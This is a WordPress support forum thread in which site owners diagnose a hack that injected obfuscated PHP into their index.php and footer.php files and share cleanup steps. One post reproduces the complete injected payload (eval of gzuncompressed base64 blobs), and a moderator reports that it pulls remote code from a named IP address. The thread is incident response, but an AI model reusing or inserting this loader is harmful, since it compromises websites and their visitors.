WordPress.org

Ready to get started?Download WordPress

Forums

Fatal error: Cannot redeclare _765258526() (55 posts)

  1. iramaura
    Member
    Posted 2 years ago #

    Hi folks,

    just yesterday noticed the following notice at the bottom on one of my subdomain websites:
    "Fatal error: Cannot redeclare _765258526() (previously declared in /home/aimaeaco/public_html/leda/wp-content/themes/Leda/footer.php(76) : eval()'d code:1) in /home/aimaeaco/public_html/leda/index.php(18) : eval()'d code on line 1"

    after this I've checked all my websites (domain & sub-domains) and each and every contains the same notice, only the directories differ.

    sub-domain where I noticed: http://leda.aimaea.com (running WP 3.2.1 and no events calendar of any sort).

    though I haven't noticed any change in the websites' functionality, it is pretty annoying to have "Fatal error" text at the very bottom of each website.

    I would appreciate Your help.

    many, many thanks in advance.

    Levee

  2. mattwhyatt
    Member
    Posted 2 years ago #

    Hi

    I too have the same problem on all my WordPress sites.
    I have the same message...

    Fatal error: Cannot redeclare _765258526() (previously declared in...

    ...at the bottom of all my sites. They are all hosted together.

    Any ideas/help much appreciated.

  3. esmi
    Forum Moderator
    Posted 2 years ago #

    @iramaura: I can't see any error on that site.

  4. ivancasasemepre
    Member
    Posted 2 years ago #

    I have the same proble :S

  5. mattwhyatt
    Member
    Posted 2 years ago #

    I've removed everything on one site I manage at http://www.sparkleandsmile.co.uk/

    It's at the bottom.

    The connection between sites I manage was a plugin called Simple "Coming soon" And "Under construction"

    As you can see at http://www.perfectlyframed.com/

    Help! What's going on?

  6. saynototheoffice
    Member
    Posted 2 years ago #

    Guys. I had this problem this morning. I think it stemmed from the fact that my site was hacked over the last couple of days which led to a malware warning on some of my pages from Google. I searched for the solution to the hack, which I fixed last night. It involved deleting some files and some malicious code inside some WP files. Anyway, I cleaned it all up last night and thought I had left it perfect.

    However, this morning I noticed the Fatal error: Cannot redeclare _765258526() error at the bottom of the screen.

    Firstly, my index.php file had some malicious code at the bottom which I hadn't seen - I deleted that but it didn't fix the problem. I looked in footer.php but couldn't see anything wrong with it. However, I restored it from a backup and it fixed the problem.

    So, it's something to do with footer.php but I don't know exactly what. If you have a backup, restore that file. If not, perhaps someone with some more knowledge could comb through and find out what's causing it.

    I also strongly recommend you to check around your site(s) and make sure they havn't been hacked. This hack affected all my sites (WordPress and otherwise) on my hosting account (Dreamhost) - in that all the index files were infected with malicious code.

  7. mattwhyatt
    Member
    Posted 2 years ago #

    Thanks @saynototheoffice I've just checked an index.php file on one of my sites and it had horrid... <?php eval(gzuncompress .... code at the bottom of it.

    I then checked other WordPress sites I manage and the same code appeared. This is the first time I've been hacked and don't know what to do, so appreciate you reply.

    I've contacted my hosting company as it looks like it all happened yesterday at 4pm as the index.php files have all been modified at that time.

    Does anyone know a solution? WordPress Gurus?
    Many thanks.

  8. saynototheoffice
    Member
    Posted 2 years ago #

    That's exactly what happened to me. Looks like you've been hit by the same hack. Are you on Dreamhost? Did you get a load of hits from a bot in Russia last week? The solution I followed was from this page:

    http://redleg-redleg.blogspot.com/2011/11/malicious-software-hosted-on-nlai.html#more

    In addition, I had to clean that horrible code out of all the index.php files of each site on my account. That solved the malware issue. Finally, I replaced the footer.php file as described above and that got rid of the warning at the bottom of the page.

    My first hack too. Hope whoever does this falls under a bus.

  9. iramaura
    Member
    Posted 2 years ago #

    hi guys!

    well, I got help from my ISP and yes, I was hacked too, mainly due to my very weak ISP profile/account password. I've strenghtened it.

    the follwoing code was embeded into some crucial files of wordpress:

    <?php eval(gzuncompress(base64_decode('eF5Tcffxd3L0CY5WjzcyNDG2NDc3MLGMV4+1dSwqSqzU0LQGAJCPCMM=')));  eval(gzuncompress(base64_decode('eF5LK81LLsnMz1OINzczNTK1MDUy01DJ1KxWSbR1LCpKrNTQtC5KLSktylNISixONTOJT0lNzk9J1VBJjFbJjNW0rgUAqDUUxQ==')));  eval(gzuncompress(base64_decode('eF6VlMmyo0YURPeO8D94192hhQokhBSOXhSjmAoVVYDQxoGYJzFKAr7ez257Ya/6/UDevHkyMnmF9ddsfT6itumGZBy/3sMxOez/iJOojZOvXxKFo1GazvHOBGLA+eUaLVZpzajUZhTU15L3GFPsjAFRPMEAFudWy/H371++ffv2+2+//pL8xAHTODKmOT6slbE1tOJ1kiCDyoCxphgvMRm9qgExefekX133El0ismOkqGKP42MZLpKJpPMS8YTx4gSYVTsZZGe4IDdMec9Y+/pC3J1NwcNz5cbyxsZi7uQpYBHw88T+MPqTTulClndJI2Dx+I1owCJqXi0kAiGDr1PmpH+r/aTW/2IFVglZi6osknzT22+Yfz8mcjvS0l0L96TTiLuQ2MMek2IXbPSj2KrAO+ddAXvjWLWGHMfuyQrhhdkqAvz+CT+ojEYjqyB0rlslDwURXHJ71jw323da2R40mRpdS4G7wsjZXqfQjIck2hxOHc/bz77v+puTkrDPFsMoxgdVLn5dNCpjnotZMiFZKLX3LSu/xWPgnXXxxd2UgOtMuStvykbQOS04ZZINfXx9sg9l5G6GtgVvWJSG0uT8cr4x+pmL+C29MFouyy5VgBmk9WCjtJIuBwvaskyLo/De1BNIvYk6O/3liRUSN4tenILmuXaHUeqGNR7ouqyfyIb+1agxALuPZs5o1dYP9iuzSthDwkcnZgxky0cQ63OW8ELrc0LllmTOu7k3emSFNcicuCO11t2flxdnl3QngmRY8ipQ5yJo5i6sb69zN06yOgr1ja6SUyJPRVYU123gNYPkwhyM6zP7/hmmDAXA/GCKt2SMs9rXRPOUifjEuvCkhqLQ52ZxkHutKdrzZvO4+yIcdsdp/z5uwlMT7sqre/Bjns096xq4ppgfSHNomHt645A8tnLo1wPeKjUWwzM6Fy6801J9qwOWfUExd9U2eVAOZElU3Vc+2pdeJGosX+U022iZa0nW/LCIQLZPbjs0Rac9tmGfK+oW7k1LsaGMWZvsxuV9LSZ3/CDdQqpA6oCMr7F+OQDN42VrNztRLVGmOi9TZL02hmort/2iyAtvpWu7CtvHXihvbeyNn8nuv6vEBwCVFjuWGDCepDPG7JO788/0Obhcsd2DeRlXYhQvsSfZsjOV63USOcMk1bTUSCPFbCNq6xTUaK1OOuMJeqnc9RL5YMhciGs39OFn+PImRQj/d0cSdpLw+uFztQLmWu4BWyAXinlxV53ppnZdr6p5H9bhoKtpsK/1p2o8c7fu3ZZtENnLjisrS95ya6iLlxQIWqoLA1ELfAUFbpnNu2GfmFa1E5Lu+YrCNimZ6OyxMGmHhWwRwSIv9dFR9ryN1h02Q8pmGjVsNrsdOMNpBat/t0oYvWgkq/vhjiWxSxuuow+lR+virP659Lri9uDEEdZeK0HFT0Ig/8jlTymmN/I='))); ?>

    pretty long crap. I've found it in the following files:

    /home/aimaeaco/public_html/leda/wp-includes/theme-compat/footer.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-content/themes/index.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-content/themes/twentyeleven/footer.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-content/themes/duotive-three/index.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-content/themes/beback/index.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-content/themes/twentyten/index.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-content/index.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-content/plugins/wordpress-popular-posts/index.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-content/plugins/index.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-content/plugins/sexybookmarks/js/index.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-content/plugins/sexybookmarks/includes/index.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-content/uploads/shareaholic/spritegen/index.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-content/uploads/shareaholic/index.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-admin/user/index.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy

    what I did was, that I removed that malicious php line from the listed files. also, I've downloaded some security plugins for my websites.

    here is a nice collection: http://www.dailytechpost.com/index.php/11-best-wordpress-security-plugins/

  10. keesiemeijer
    moderator
    Posted 2 years ago #

  11. iramaura
    Member
    Posted 2 years ago #

    hi folks!

    @keesiemeijer: thanks for the security links.

    has anyobody fixed the site yet? please share the experience.

    many thanks!

  12. mattwhyatt
    Member
    Posted 2 years ago #

    I've been in touch with my hosting company who have been no help whatsoever.

    I'm going through the steps..

    I've downloaded ClamXav to scan my computer as suggested on a few other links.

    Nothing fixed yet!

  13. saynototheoffice
    Member
    Posted 2 years ago #

    @iramaura Yes - I managed to fix my site - look at my post above.

  14. iramaura
    Member
    Posted 2 years ago #

    hi again!

    @saynototheoffice: I meant the other two guys who had the same issue. as a matter of fact, I've had a russian bot attack, but no attention I payed.

    @mattwhyatt: my ISP reacted immediately, I was slow. maybe consider migrating to another.

    I'm still in learning phase, so I'll pay more attention to security - bit glad this issue occurred.

    thanks for Your assistance.

    cheers!

  15. saynototheoffice
    Member
    Posted 2 years ago #

    OK - I just spent some more time cleaning this up and used this script to detect malicious code:

    http://redleg-redleg.blogspot.com/p/simple-script-to-find-base64decode-in.html

    What I found was that this attack basically inserts the code into any file called 'index' on the hosting account - of which there are quite a few.

  16. mattwhyatt
    Member
    Posted 2 years ago #

    @saynototheoffice: That's a great link to the script detector. Many thanks. My hosting have come back and said that they are 99.9% secure and the attack happened through one of my sites. That's it. No helping but happy to take my money.

    I've got some code removing to be doing.

    Thanks everyone for their help.

  17. victorciobanu
    Member
    Posted 2 years ago #

    This attack is related to the MW:JS:DEPACK one.
    Your linux server is infected, i would recommend changing all the passwords you can (sql,root,ftp).

    I had the MW:JS:DEPACK on november 5'th and written an article about it here How to Remove MW:JS:DEPACK.

    On 14 nov my server (all index.php) files were infected by this mallware.
    I've written a tutorial here How to remove Cannot redeclare _765258526 , however i realize now that the issue is with the server and not the wordpress install.

    To avoid removing all the code by hand just replace (overwrite) the wordpress install files, then manually clean the theme's index.php

    CHMOD'ing the theme index.php to 444 helps, otherwise the code will be inserted again.

    I'm starting to think that these are anonymous's (the hacker group) DDOS'es at work (they are using our site's visitors), since both exploits (ms:js:deepack and redeclare_76528526) open an invisible iframe on our site, iframe that loads a certain page at a certain moment (with js:deepack it was facebook)

  18. victorciobanu
    Member
    Posted 2 years ago #

    *edit - this exploit however does not work since workpress uses 2 index.php files ... the one the wordpress intall has(root) and the theme's(wp-content/themes) index.php ; and the code declares function _765258526($i){$a=Array();return base64_decode($a[$i]);} twice, since it's inserted in both files, causing it to malfunction

    so far i have decoded `$GLOBALS['_2143977049_']=Array();
    function _765258526($i){$a=Array();return base64_decode($a[$i]);}
    $GLOBALS['_226432454_']=Array();` there is another part i cannot decode yet.

    Decoding the whole thing would help us find out what was the malware script doing and putting a stop to these kind of recent hacks.

  19. keesiemeijer
    moderator
    Posted 2 years ago #

    I've been trying to decode the code given by iramaura: http://pastebin.com/i73NKHiU

    the results of that decoding are: http://pastebin.com/xAeB81uL

    It seems it wants to get code included from: 91.196.216.64/btt.php
    I also think it fails to do this. not sure though.

  20. victorciobanu
    Member
    Posted 2 years ago #

    @keesiemeijer you rock ! btt.php is the key !

    logged on to my server, and looked for the file, i only found that file on infected wordpress instalations. btt.php looks to be related to tehnocrati import module and it was used to put some files in the server in /wp-admin/import

    while looking for the file i noticed something strange in one of my installs in wp-admin/import/wunderbar_emporium !!! inside this folder there are some files that were not supposed to be there. they are most likely put there by the hacker !

    this is mind-blowing stuff ! i will invastigate this further and post the results!

    wunderbar_emporium is the name of the linux exploit responsible for all this hassle ! contact your host providers (i run my own server) and notify them about this (check to see if the files are there first)

  21. marujobhz
    Member
    Posted 2 years ago #

    i have 2 sites affected, with a php malicious code in index and footer.php files of theme used. i removed both code and change the password of user wp and ftp. its sufficient, or i must do other things?
    my sites are hosted on dreamhost too.

  22. saynototheoffice
    Member
    Posted 2 years ago #

    @marujobhz In summary:

    - Delete all the themes and plugins you aren't using
    - Clean code from all footer.php and index.php. You have to look carefully as the hackers hide them with white space.
    - Run the script I linked to above to detect any other malicious code and delete
    - Change the database password. You have to do that in Dreamhost control panel and unfortunately the new password you set for the 'user' will affect all the databases you are using that user to access - if you see what I mean. Then you have to change the WP configuration file with the new DB password - for all sites on your account. Also, if you have any other non WP sites, you will have to change the configuration of them too.

    I'm not an expert, but this worked for me. Good luck. J

  23. marujobhz
    Member
    Posted 2 years ago #

    hi, im doing it. one question: all files listed with "contains base64_decode" are infected?? in my search, the script is listed too: ./find-string.php -> contains base64_decode

  24. marujobhz
    Member
    Posted 2 years ago #

    so im run the find string and change the pws, and now i have this result:
    its is normal or i have to delete some part of code? i dont see the strange code/script in these files...
    ./find-string.php -> contains base64_decode
    ./site/wp-app.php -> contains base64_decode
    ./site/wp-content/themes/themename/scripts/timthumb.php -> contains base64_decode
    ./site/wp-content/plugins/shortcodes-ultimate/lib/timthumb.php -> contains base64_decode
    ./site/wp-content/plugins/gravityforms/form_display.php -> contains base64_decode
    ./site/wp-includes/class-IXR.php -> contains base64_decode
    ./site/wp-includes/class-simplepie.php -> contains base64_decode
    Could not check ./site/wp-includes/js/jquery.js
    thanks!

  25. saynototheoffice
    Member
    Posted 2 years ago #

    Not all the files that come up positive necessarily have malicious code. You can normally tell if the code looks dodgy - you have to use your judgment. I think the ones you have listed are OK. I had those too.

  26. marujobhz
    Member
    Posted 2 years ago #

    ok, i think now its ok. how i can warn google to retire the alert with malicious. its possible? i install the plugin 'secure wordpress', that use 'werbsite defender' to scan the website. so, its show me this alerts:
    Malware
    SpamHaus - DNS1 - ns1.dreamhost.com.
    its possible to dreamhost have the virus/malware inside webserver/host?
    thanks.
    keep in touch to verify and propose solutions.
    best regards!

  27. saynototheoffice
    Member
    Posted 2 years ago #

    You have to request a review from within Webmaster tools. Can't answer the other questions, sorry.

  28. iramaura
    Member
    Posted 2 years ago #

    hi again,

    the script from Red Leg blog is a fine little tool, though it lists "healthy" files as well (but it really doesn't matter).

    how old is this kind of malware attack? have such attacks happend in the past and how often do such malicious attacks happen?

    which WP plugins may strenghten websites' security, i.e. which ones from the link I attached earlier would You recommend?

    many thanks for all Your efforts.

    cheers!

  29. keesiemeijer
    moderator
    Posted 2 years ago #

  30. lavalink
    Member
    Posted 2 years ago #

    This dumb hack hit me too. Second time I've been hacked in two months. My friend who uses Dreamhost got hit by it as well. It's unfortunate as my friends are talking about switching to Drupal because of WordPress being targeted so much and broken into so easily these days.

Topic Closed

This topic has been closed to new replies.

About this Topic